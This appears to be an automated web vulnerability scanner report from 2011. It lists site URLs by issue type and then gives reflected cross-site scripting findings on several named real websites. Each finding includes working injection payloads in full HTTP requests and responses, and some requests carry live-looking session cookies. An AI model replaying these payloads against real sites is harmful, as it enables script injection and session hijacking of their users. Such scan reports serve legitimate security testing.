17.110. https://www.credit-suisse.com/responsibility/en/employer/development.jsp

17.111. https://www.credit-suisse.com/responsibility/en/employer/diversity.jsp

17.112. https://www.credit-suisse.com/responsibility/en/employer/gdi_strategy.jsp

17.113. https://www.credit-suisse.com/responsibility/en/employer/graduates.jsp

17.114. https://www.credit-suisse.com/responsibility/en/employer/health_social_care.jsp

17.115. https://www.credit-suisse.com/responsibility/en/employer/index.jsp

17.116. https://www.credit-suisse.com/responsibility/en/employer/networks.jsp

17.117. https://www.credit-suisse.com/responsibility/en/employer/partners_awards.jsp

17.118. https://www.credit-suisse.com/responsibility/en/employer/pkom.jsp

17.119. https://www.credit-suisse.com/responsibility/en/employer/workplace.jsp

17.120. https://www.credit-suisse.com/responsibility/en/environment.jsp

17.121. https://www.credit-suisse.com/responsibility/en/environmental_management.jsp

17.122. https://www.credit-suisse.com/responsibility/en/gri_index.jsp

17.123. https://www.credit-suisse.com/responsibility/en/index.jsp

17.124. https://www.credit-suisse.com/responsibility/en/initiatives/climate/index.jsp

17.125. https://www.credit-suisse.com/responsibility/en/initiatives/education_initiative/initiatives_education.jsp

17.126. https://www.credit-suisse.com/responsibility/en/initiatives/employee_engagement.jsp

17.127. https://www.credit-suisse.com/responsibility/en/initiatives/gcp.jsp

17.128. https://www.credit-suisse.com/responsibility/en/initiatives/index.jsp

17.129. https://www.credit-suisse.com/responsibility/en/initiatives/initiatives_microfinance.jsp

17.130. https://www.credit-suisse.com/responsibility/en/initiatives/microfinance_accion.jsp

17.131. https://www.credit-suisse.com/responsibility/en/jubilee_fund.jsp

17.132. https://www.credit-suisse.com/responsibility/en/measures_in_regions.jsp

17.133. https://www.credit-suisse.com/responsibility/en/objectives.jsp

17.134. https://www.credit-suisse.com/responsibility/en/philanthropy.jsp

17.135. https://www.credit-suisse.com/responsibility/en/philanthropy_apac.jsp

17.136. https://www.credit-suisse.com/responsibility/en/philanthropy_application.jsp

17.137. https://www.credit-suisse.com/responsibility/en/philanthropy_emea.jsp

17.138. https://www.credit-suisse.com/responsibility/en/philanthropy_global.jsp

17.139. https://www.credit-suisse.com/responsibility/en/philantropy_americas.jsp

17.140. https://www.credit-suisse.com/responsibility/en/reporting.jsp

17.141. https://www.credit-suisse.com/responsibility/en/society/dialogue.jsp

17.142. https://www.credit-suisse.com/responsibility/en/society/employer.jsp

17.143. https://www.credit-suisse.com/responsibility/en/society/expertise.jsp

17.144. https://www.credit-suisse.com/responsibility/en/society/homemarket.jsp

17.145. https://www.credit-suisse.com/responsibility/en/society/opinion_leaders.jsp

17.146. https://www.credit-suisse.com/responsibility/en/society/public_debate.jsp

17.147. https://www.credit-suisse.com/responsibility/en/society/salon.jsp

17.148. https://www.credit-suisse.com/responsibility/en/society/sponsoring_switzerland.jsp

17.149. https://www.credit-suisse.com/responsibility/en/society/svc_risikokapital.jsp

17.150. https://www.credit-suisse.com/responsibility/en/society/switzerland.jsp

17.151. https://www.credit-suisse.com/responsibility/en/suppliers_partners.jsp

17.152. https://www.credit-suisse.com/responsibility/en/sustainability_rating.jsp

17.153. https://www.credit-suisse.com/responsibility/it/accessibility.jsp

17.154. https://www.credit-suisse.com/responsibility/it/index.jsp

17.155. https://www.credit-suisse.com/sitemap/en/

17.156. https://www.credit-suisse.com/sitemap/en/index.jsp

17.157. https://www.credit-suisse.com/sitemap/it/index.jsp

17.158. https://www.credit-suisse.com/tooldbrowser.jsp

17.159. https://www.credit-suisse.com/triage/en/triage.jsp

17.160. https://www.credit-suisse.com/us/

17.161. https://www.credit-suisse.com/us/asset_management/en/

17.162. https://www.credit-suisse.com/us/asset_management/en/about_asset_management.jsp

17.163. https://www.credit-suisse.com/us/asset_management/en/am_management_committee.jsp

17.164. https://www.credit-suisse.com/us/asset_management/en/awards/index.jsp

17.165. https://www.credit-suisse.com/us/asset_management/en/credit_suisse_funds/pop_fund_performance.jsp

17.166. https://www.credit-suisse.com/us/asset_management/en/index.jsp

17.167. https://www.credit-suisse.com/us/asset_management/en/products/index.jsp

17.168. https://www.credit-suisse.com/us/asset_management/en/thought_leadership/201108_commodities_outlook.jsp

17.169. https://www.credit-suisse.com/us/asset_management/en/thought_leadership/201108_market_update.jsp

17.170. https://www.credit-suisse.com/us/asset_management/en/thought_leadership/insights_2011.jsp

17.171. https://www.credit-suisse.com/us/asset_management/en/value_proposition.jsp

17.172. https://www.credit-suisse.com/us/equities/en/

17.173. https://www.credit-suisse.com/us/equities/en/brazilian_equities.jsp

17.174. https://www.credit-suisse.com/us/equities/en/customized_solutions.jsp

17.175. https://www.credit-suisse.com/us/equities/en/emerging_market_equities.jsp

17.176. https://www.credit-suisse.com/us/equities/en/european_equities.jsp

17.177. https://www.credit-suisse.com/us/equities/en/global_equities.jsp

17.178. https://www.credit-suisse.com/us/equities/en/global_indices.jsp

17.179. https://www.credit-suisse.com/us/equities/en/index.jsp

17.180. https://www.credit-suisse.com/us/equities/en/quantitative_equities.jsp

17.181. https://www.credit-suisse.com/us/equities/en/swiss_equities.jsp

17.182. https://www.credit-suisse.com/us/equities/en/us_equities.jsp

17.183. https://www.credit-suisse.com/us/fixed_income/en/

17.184. https://www.credit-suisse.com/us/fixed_income/en/index.jsp

17.185. https://www.credit-suisse.com/us/hedge_strategies/en/

17.186. https://www.credit-suisse.com/us/hedge_strategies/en/index.jsp

17.187. https://www.credit-suisse.com/us/multi_asset_class_solutions/en/

17.188. https://www.credit-suisse.com/us/multi_asset_class_solutions/en/index.jsp

17.189. https://www.credit-suisse.com/us/private_equity/en/

17.190. https://www.credit-suisse.com/us/private_equity/en/index.jsp

17.191. https://www.credit-suisse.com/us/privateadvisors/en/

17.192. https://www.credit-suisse.com/us/privatebanking/approach/en/index.jsp

17.193. https://www.credit-suisse.com/us/privatebanking/bank/en/contact.jsp

17.194. https://www.credit-suisse.com/us/privatebanking/bank/en/index.jsp

17.195. https://www.credit-suisse.com/us/privatebanking/doc/ars_settlement_information.pdf

17.196. https://www.credit-suisse.com/us/privatebanking/en/

17.197. https://www.credit-suisse.com/us/privatebanking/en/index.jsp

17.198. https://www.credit-suisse.com/us/privatebanking/investmentsolutions/en/index.jsp

17.199. https://www.credit-suisse.com/us/privatebanking/multimedia/demo.html

17.200. https://www.credit-suisse.com/us/privatebanking/people/en/index.jsp

17.201. https://www.credit-suisse.com/us/privatebanking/wealthservices/en/index.jsp

17.202. https://www.credit-suisse.com/us/real_assets/en/

17.203. https://www.credit-suisse.com/us/real_assets/en/index.jsp

17.204. https://www.credit-suisse.com/who_we_are/en/

17.205. https://www.credit-suisse.com/who_we_are/en/index.jsp

17.206. https://www.credit-suisse.com/who_we_are/en/locations_overview.jsp

17.207. https://www.credit-suisse.com/who_we_are/en/office_locator.jsp

17.208. https://www.credit-suisse.com/who_we_are/it/index.jsp

17.209. https://www.credit-suisse.com/who_we_are/it/locations_overview.jsp

17.210. https://www.cyscape.com/%22/products/bhtg//%22

17.211. https://www.cyscape.com/images/common/episodes.gif%22

17.212. https://www.cyscape.com/order/order.asp

17.213. https://www.cyscape.com/products/bhawk/

17.214. https://www.cyscape.com/products/bhtg/

17.215. https://www.cyscape.com/products/bhtg/howitworks.aspx

17.216. https://www.onekingslane.com/corporate/careers/

17.217. https://www.onekingslane.com/corporate/careers/tech/

18. HTML does not specify charset

18.1. http://www.coldbox.org/includes/images/MessageBox.png

18.2. https://www.credit-suisse.com/investment_banking/

18.3. https://www.credit-suisse.com/markets/emerging_markets/

18.4. https://www.credit-suisse.com/us/

18.5. http://www.csfb.com/locus/

18.6. http://www.csfb.com/warrants/map.shtml

18.7. https://www.cyscape.com/order/order.asp

18.8. http://www.demo.com/a/i/wht-org-grd.png

18.9. http://www.demo.com/a/l/ngconnect_108x54.gif

18.10. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

18.11. http://www.goclio.com/

18.12. http://www.goclio.com/legal/privacy/

18.13. http://www.goclio.com/legal/tos/

18.14. http://www.goclio.com/our_customers/

18.15. http://www.goclio.com/signup/

18.16. http://www.goclio.com/tour/

18.17. http://www.idg.com/www/homenew.nsf/home

18.18. http://www.nationaldentalreviews.org/Handlers/ImageDisplay.ashx

18.19. http://www.ortussolutions.com/includes/images/ul_li.gif

18.20. http://www.spro.com/Default.asp

18.21. http://www.vormetric.com/

19. HTML uses unrecognised charset

19.1. http://www.genuinewin7.com/favicon.ico

19.2. http://www.genuinewin7.com/js/png.js

20. Content type incorrectly stated

20.1. http://www.cio.com/favicon.ico

20.2. http://www.cio.com/images/cec/martha_heller_sm.jpg

20.3. http://www.computerworld.com/favicon.ico

20.4. https://www.createspace.com/Special/Js/menu_config.js.jsp

20.5. https://www.credit-suisse.com/asset_management/global_includes/extensions/klp2_big_image.css

20.6. http://www.csoonline.com/favicon.ico

20.7. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

20.8. http://www.facebook.com/extern/login_status.php

20.9. http://www.gamepro.com/lib/css/fonts/Arvo-Regular-webfont.woff

20.10. http://www.gamepro.com/lib/css/fonts/BEBAS___-webfont.woff

20.11. http://www.gamepro.com/lib/css/fonts/BebasNeue-webfont.woff

20.12. http://www.gamepro.com/lib/css/fonts/stag-semibold-webfont.woff

20.13. http://www.gamepro.com/lib/includes/components/flush/gamedownloads_rightrail_data.cfm

20.14. http://www.genuinewin7.com/css/default_2011.css

20.15. http://www.genuinewin7.com/js/ExternalJS-default.js

20.16. http://www.genuinewin7.com/js/pop.js

20.17. http://www.genuinewin7.com/js/share.js

20.18. http://www.genuinewin7.com/js/why-win7.js

20.19. http://www.google.com/ig/cp/get

20.20. http://www.idgconnect.com/javascripts/connect.js

20.21. http://www.infoworld.com/sites/default/files/ifw_favicon.ico

20.22. http://www.itworld.com/kickapps/isfollowing-comments/204223

20.23. http://www.law.com/img/law_10/favicon.ico

20.24. http://www.mach-ii.com/img/favicon.ico

20.25. http://www.model-glue.com/images/top_bg.gif

20.26. http://www.model-glue.com/js/sm-iepng.js

20.27. http://www.mtholyoke.edu/favicon.ico

20.28. http://www.nationaldentalreviews.org/Handlers/ImageDisplay.ashx

20.29. http://www.reismancarolla.com/favicon.ico

20.30. http://www.simplyhired.com/a/catalog/keywords

20.31. http://www.simplyhired.com/a/facebook/metrics

20.32. http://www.simplyhired.com/a/facebook/status

20.33. http://www.stumbleupon.com/services/1.1/badge.getinfo

20.34. http://www.zdnet.fr/blogs/i/img/551888_65x68.png

20.35. http://www9.effectivemeasure.net/v4/em_js

21. Content type is not specified



1. Cross-site scripting (reflected)  next
There are 602 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.demo.com/a/i/wht-org-grd.png [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.demo.com
Path:   /a/i/wht-org-grd.png

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 58fae--><img%20src%3da%20onerror%3dalert(1)>90ecb6ec8da was submitted in the REST URL parameter 3. This input was echoed as 58fae--><img src=a onerror=alert(1)>90ecb6ec8da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a/i/wht-org-grd.png58fae--><img%20src%3da%20onerror%3dalert(1)>90ecb6ec8da HTTP/1.1
Host: www.demo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.demo.com/a/s/demohp_090611.css
Cookie: Apache=50.23.123.106.1316460611979487

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:32:03 GMT
Server: Apache/2.0.55 (Unix) DAV/2 mod_ssl/2.0.55 OpenSSL/0.9.8a PHP/4.4.4
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private
Content-Length: 886

   
       <HTML>
       <HEAD>
       <TITLE>404 Error</TITLE>
       <META NAME="description" content="This is the code redirect page that needs to be more than 512 bytes for IE to notice it. So this description is in
...[SNIP]...
<!--code was: wht-org-grd.png58fae--><img src=a onerror=alert(1)>90ecb6ec8da-->
...[SNIP]...

1.2. http://www.demo.com/a/i/wht-org-grd.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.demo.com
Path:   /a/i/wht-org-grd.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 63623--><img%20src%3da%20onerror%3dalert(1)>718e3e3167c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 63623--><img src=a onerror=alert(1)>718e3e3167c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a/i/wht-org-grd.png?63623--><img%20src%3da%20onerror%3dalert(1)>718e3e3167c=1 HTTP/1.1
Host: www.demo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.demo.com/a/s/demohp_090611.css
Cookie: Apache=50.23.123.106.1316460611979487

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:59 GMT
Server: Apache/2.0.55 (Unix) DAV/2 mod_ssl/2.0.55 OpenSSL/0.9.8a PHP/4.4.4
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private
Content-Length: 889

   
       <HTML>
       <HEAD>
       <TITLE>404 Error</TITLE>
       <META NAME="description" content="This is the code redirect page that needs to be more than 512 bytes for IE to notice it. So this description is in
...[SNIP]...
<!--code was: wht-org-grd.png?63623--><img src=a onerror=alert(1)>718e3e3167c=1-->
...[SNIP]...

1.3. http://www.demo.com/a/l/ngconnect_108x54.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.demo.com
Path:   /a/l/ngconnect_108x54.gif

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b68ab--><img%20src%3da%20onerror%3dalert(1)>e8f86aee36e was submitted in the REST URL parameter 3. This input was echoed as b68ab--><img src=a onerror=alert(1)>e8f86aee36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a/l/ngconnect_108x54.gifb68ab--><img%20src%3da%20onerror%3dalert(1)>e8f86aee36e HTTP/1.1
Host: www.demo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.demo.com/
Cookie: Apache=50.23.123.106.1316460611979487

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:32 GMT
Server: Apache/2.0.55 (Unix) DAV/2 mod_ssl/2.0.55 OpenSSL/0.9.8a PHP/4.4.4
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private
Content-Length: 891

   
       <HTML>
       <HEAD>
       <TITLE>404 Error</TITLE>
       <META NAME="description" content="This is the code redirect page that needs to be more than 512 bytes for IE to notice it. So this description is in
...[SNIP]...
<!--code was: ngconnect_108x54.gifb68ab--><img src=a onerror=alert(1)>e8f86aee36e-->
...[SNIP]...

1.4. http://www.demo.com/a/l/ngconnect_108x54.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.demo.com
Path:   /a/l/ngconnect_108x54.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62993--><img%20src%3da%20onerror%3dalert(1)>3864daf17cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62993--><img src=a onerror=alert(1)>3864daf17cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a/l/ngconnect_108x54.gif?62993--><img%20src%3da%20onerror%3dalert(1)>3864daf17cb=1 HTTP/1.1
Host: www.demo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.demo.com/
Cookie: Apache=50.23.123.106.1316460611979487

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:31:27 GMT
Server: Apache/2.0.55 (Unix) DAV/2 mod_ssl/2.0.55 OpenSSL/0.9.8a PHP/4.4.4
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private
Content-Length: 894

   
       <HTML>
       <HEAD>
       <TITLE>404 Error</TITLE>
       <META NAME="description" content="This is the code redirect page that needs to be more than 512 bytes for IE to notice it. So this description is in
...[SNIP]...
<!--code was: ngconnect_108x54.gif?62993--><img src=a onerror=alert(1)>3864daf17cb=1-->
...[SNIP]...

1.5. http://www.demo.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.demo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 9ddc4--><img%20src%3da%20onerror%3dalert(1)>cf71f3ede8a was submitted in the REST URL parameter 1. This input was echoed as 9ddc4--><img src=a onerror=alert(1)>cf71f3ede8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico9ddc4--><img%20src%3da%20onerror%3dalert(1)>cf71f3ede8a HTTP/1.1
Host: www.demo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Apache=50.23.123.106.1316460611979487; __utma=9732650.323602606.1316478684.1316478684.1316478684.1; __utmb=9732650.1.10.1316478684; __utmc=9732650; __utmz=9732650.1316478684.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2011 19:34:25 GMT
Server: Apache/2.0.55 (Unix) DAV/2 mod_ssl/2.0.55 OpenSSL/0.9.8a PHP/4.4.4
Accept-Ranges: bytes
Content-Type: text/html
Cache-Control: private
Content-Length: 882

   
       <HTML>
       <HEAD>
       <TITLE>404 Error</TITLE>
       <META NAME="description" content="This is the code redirect page that needs to be more than 512 bytes for IE to notice it. So this description is in
...[SNIP]...
<!--code was: favicon.ico9ddc4--><img src=a onerror=alert(1)>cf71f3ede8a-->
...[SNIP]...

1.6. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1730b<script>alert(1)</script>7d8f22d09d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=581&e=0&t=687&f=javascript&1730b<script>alert(1)</script>7d8f22d09d2=1 HTTP/1.1
Host: www.dinclinx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 19 Sep 2011 19:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 19 Sep 2011 19:30:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 1730b<script>alert(1)</script>7d8f22d09d2

1.7. http://www.genuinewin7.com/purchase.aspx [WT.page_from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genuinewin7.com
Path:   /purchase.aspx

Issue detail

The value of the WT.page_from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9409c"style%3d"x%3aexpr/**/ession(alert(1))"06a2a2565ec was submitted in the WT.page_from parameter. This input was echoed as 9409c"style="x:expr/**/ession(alert(1))"06a2a2565ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /purchase.aspx?WT.page_from=safety9409c"style%3d"x%3aexpr/**/ession(alert(1))"06a2a2565ec HTTP/1.1
Host: www.genuinewin7.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.genuinewin7.com/safety.aspx?WT.page_from=nav
Cookie: uid=56999891_1316636622599; ctpath=; referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; campaignid=369; WT_FPC=id=27aab3ee2244904c44a1316683422666:lv=1316684122097:ss=1316683422666; WT_NVR=0=/

Response

HTTP/1.1 200 OK
Date: Wed, 21 Sep 2011 15:36:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: CP=CAO PSA OUR
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="dell.aspx?WT.page_from=purchase&WT.page_from_pre=safety9409c"style="x:expr/**/ession(alert(1))"06a2a2565ec" onclick="var i=new Image(1,1);i.src='http://e.miaozhen.com/r.gif?'+Math.random()+'^k=2039^p=DNR0'; ii=new Image(1,1);ii.src='http://e.miaozhen.com/e.gif?'+Math.random()+'^n=3961^ae=1142';ClickEvent('
...[SNIP]...

1.8. http://www.google.com/search [tch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 226a4(a)7aefa97b5eb was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sclient=psy-ab&hl=en&source=hp&q=coastal+dentalcare&pbx=1&oq=coastal+dentalcare&aq=f&aqi=&aql=&gs_sm=e&gs_upl=10136l10136l0l10780l1l1l0l0l0l0l0l0ll0l0&bav=on.2,or.r_gc.r_pw.&fp=1aed890c2a32d146&biw=1097&bih=869&tch=1226a4(a)7aefa97b5eb&ech=1&psi=i314TveFCYOosALp7fyvDQ.1316537398329.3 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=coastal+dental+care
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: sXoKgwNA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mIeAi_BJiW80o5-UkWcKjFthqIayl4ofwCkkr5tCLyeEVJT5ggTfhss2g11zdOuIt-Hv9il_Hia-F6KLtiAoqwnGANxD2SU6BtvNGiXQ0002QmWyW7uUzO1rQ_23mKUx; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjPyFqRf-B0ODOWTiDE99xOOc8RvdQGibPMhmcP610qN-DHB8k6z8ZKlplWLUKEP3dWEI72OUKY84U0zjZ2dOwJHOZWczA6xdlkRwrrTGTkQ6ClNLTQ4ONOC9gLOWYQ5zR2CljOq1RO-s4LLdPs6xoVlnnO6qY1kM7iyGUBole70mO999gxJRMDD84aZSLhlXLa_TFwj4UOugh1muMR40AyHJcRNGXDTOXCL27QwmaPSWsRZbzw7pybi4zMXxNEJkaJnnPm7S6PNHhmHFQ58RIqky0TX53BbS_4Obo4j-cWcY

Response

HTTP/1.1 200 OK
Date: Tue, 20 Sep 2011 11:49:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 65929

NKGaDyNz....S....%..h.p...\.....D..I<!doctype html><title>coastal dentalcare - Google Search</title><script>(function(){var jesr_base_page_version=21;var jesr_user_state='9b3eddd0';var jesr_signal_bas
...[SNIP]...
